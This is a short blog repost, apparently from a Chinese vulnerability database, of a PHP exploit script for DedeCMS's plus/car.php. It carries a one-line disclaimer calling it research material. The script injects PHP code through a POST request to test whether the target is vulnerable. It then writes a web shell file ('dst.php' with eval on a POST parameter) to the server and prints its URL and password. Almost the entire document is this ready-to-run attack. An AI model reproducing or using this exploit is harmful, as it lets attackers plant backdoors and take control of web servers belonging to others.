测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?php
    2. $host=$argv[1];
    3. $path=$argv[2];
    4. $path=$path."plus/car.php";
    5. $url=$path;
    6. if(count($argv)<3){
    7. print_r('
    8. Usage: php '.$argv[0].' host path
    9. Example:
    10. php '.$argv[0].' www.site.com /dede/
    11. 作者:舞林 http://t.qq.com/wulinlw
    12. 修改:小逸
    13. ');
    14. exit;
    15. }
    16. $data='$a=${@phpinfo()};';
    17. $buffer = POST($host,80,$url,$data,30);
    18. preg_match("/allow_url_fopen/i", $buffer, $arr_suc);
    19.  
    20. $str="allow_url_fopen";
    21. if($arr_suc[0]==$str){
    22. echo "Congratulations,target exist this bug.\n";
    23. $data='$a=${@file_put_contents("dst.php","<?php eval(\$_POST[cmd]); ?>")};';
    24. $buffer = POST($host,80,$url,$data,30);
    25. echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";
    26. }
    27. else {
    28. echo "Sorry,target may not exist this bug.";
    29. exit;
    30. }
    31. function POST($host,$port,$path,$data,$timeout, $cookie='') {
    32. $buffer='';
    33. $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
    34. if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
    35. else {
    36. fputs($fp, "POST $path HTTP/1.0\r\n");
    37. fputs($fp, "Host: $host\r\n");
    38. fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    39. fputs($fp, "Content-length: ".strlen($data)."\r\n");
    40. fputs($fp, "Connection: close\r\n\r\n");
    41. fputs($fp, $data."\r\n\r\n");
    42.  
    43. while(!feof($fp))
    44. {
    45. $buffer .= fgets($fp,4096);
    46. }
    47. fclose($fp);
    48. }
    49. return $buffer;
    50. }
    51. ?>
    52. 摘自:http://sebug.net/vuldb/ssvid-60162
posted on 2014-03-21 15:07  milantgh  阅读(1210)  评论(0编辑  收藏  举报